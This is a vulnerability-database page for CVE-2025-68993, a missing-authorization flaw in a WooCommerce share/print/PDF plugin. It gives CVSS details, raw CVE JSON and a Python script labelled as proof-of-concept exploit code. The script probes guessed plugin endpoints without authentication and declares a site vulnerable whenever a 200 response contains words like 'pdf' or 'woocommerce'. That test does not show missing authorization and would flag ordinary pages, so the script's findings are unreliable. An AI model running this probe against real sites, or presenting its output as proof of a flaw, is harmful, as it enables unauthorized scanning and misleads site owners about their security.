Security Vulnerability Report
中文
CVE-2025-68993 CVSS 5.3 MEDIUM

CVE-2025-68993

Published: 2025-12-30 11:15:58
Last Modified: 2026-04-27 19:16:40

Description

Missing Authorization vulnerability in XforWooCommerce Share, Print and PDF Products for WooCommerce share-print-pdf-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Share, Print and PDF Products for WooCommerce: from n/a through <= 3.1.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Share, Print and PDF Products for WooCommerce <= 3.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68993 PoC - Missing Authorization in Share Print PDF WooCommerce Plugin # Affected versions: <= 3.1.2 import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-68993 This PoC attempts to access protected functionality without authentication """ # Common WordPress plugin endpoints that might be affected endpoints = [ '/wp-json/share-print-pdf/v1/', '/wp-admin/admin-ajax.php?action=spp_', '/wp-content/plugins/share-print-pdf-woocommerce/includes/', ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-68993 - Missing Authorization in Share Print PDF WooCommerce Plugin") print("=" * 60) vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send unauthenticated request to check for missing authorization response = requests.get(url, timeout=10, verify=False) # Check if we can access protected resources without authentication if response.status_code == 200: # Check for sensitive data exposure if any(keyword in response.text.lower() for keyword in ['pdf', 'print', 'share', 'woocommerce']): print(f"[+] POTENTIALLY VULNERABLE: {url}") print(f"[+] Status Code: {response.status_code}") print(f"[+] Response contains sensitive plugin functionality") vulnerable = True elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: {url} (Status: {response.status_code})") else: print(f"[*] Endpoint not found or error: {url} (Status: {response.status_code})") except requests.exceptions.RequestException as e: print(f"[!] Error testing {url}: {str(e)}") print("=" * 60) if vulnerable: print("[!] Target appears to be VULNERABLE to CVE-2025-68993") print("[!] Recommendation: Update Share Print PDF Products for WooCommerce to latest version") else: print("[*] Target may not be vulnerable or plugin not installed") return vulnerable if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-68993-poc.py <target_url>") print("Example: python cve-2025-68993-poc.py http://target.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68993", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:58.043", "lastModified": "2026-04-27T19:16:40.443", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in XforWooCommerce Share, Print and PDF Products for WooCommerce share-print-pdf-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Share, Print and PDF Products for WooCommerce: from n/a through <= 3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/share-print-pdf-woocommerce/vulnerability/wordpress-share-print-and-pdf-products-for-woocommerce-plugin-3-1-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}